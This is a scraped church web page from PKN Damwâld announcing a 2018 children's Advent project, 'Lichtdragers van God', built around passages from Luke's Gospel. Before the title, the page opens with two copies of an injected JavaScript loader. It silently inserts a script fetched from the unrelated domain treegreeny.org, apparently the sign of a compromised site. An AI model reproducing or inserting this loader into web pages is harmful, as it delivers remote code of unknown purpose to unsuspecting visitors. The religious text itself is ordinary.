;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kingkids kerstproject 'Lichtdragers van God' - PKN Damwâld

Kingkids kerstproject ‘Lichtdragers van God’

Gepubliceerd op: donderdag 6 december 2018

De Kingkids gaan komende zondag weer verder met het advent/kerstproject. Zoals gebruikelijk beginnen de kinderen in de kerk en gaan van daaruit  naar ’t Skûlplak.
Het thema van het kerstproject is dit jaar  ‘Lichtdragers van God’. We lezen de Bijbelgedeelten uit het Lucas-evangelie die voorafgaan aan de geboorte van Gods Zoon. We concentreren ons op vijf personen die ieder op hun manier reageren op de boodschap van God die verlossend in hun leven en in de wereld komt.
Zacharias omschrijft dat in zijn lofzang zo: ‘Dankzij de liefdevolle barmhartigheid van onze God zal het stralende licht uit de hemel over ons opgaan en verschijnen aan allen die leven in duisternis en verkeren in de schaduw van de dood, zodat we onze voeten kunnen zetten op de weg van de vrede’ (Lucas 1:78-79). We zien hier twee dingen: 1. Was God niet gekomen in zijn Zoon dan was het duister gebleven. Maar ook 2.: Hadden mensen niet geloofd in Gods vrede, dan was het duister gebleven. God geeft Jezus vanuit zijn wonderlijke liefde en genade aan de mensen en vraagt om een antwoord. Door die antwoorden (in nood, vanuit kleingeloof, vol vertrouwen, geholpen door medegelovigen) zien we dat Gods licht steeds meer gaat stralen en dat zijn verlossing in Christus wordt geopenbaard. En dankzij Gods Geest zien wij in de adventstijd Gods liefde ook voor ons allen verschijnen. We zien de lichtdragers en worden zelf lichtdragers achter de Lichtdrager die in Betlehem geboren werd.
We hopen op een fijne adventstijd en kerst, waarin we samen met de gemeente groeien als lichtdragers van Jezus!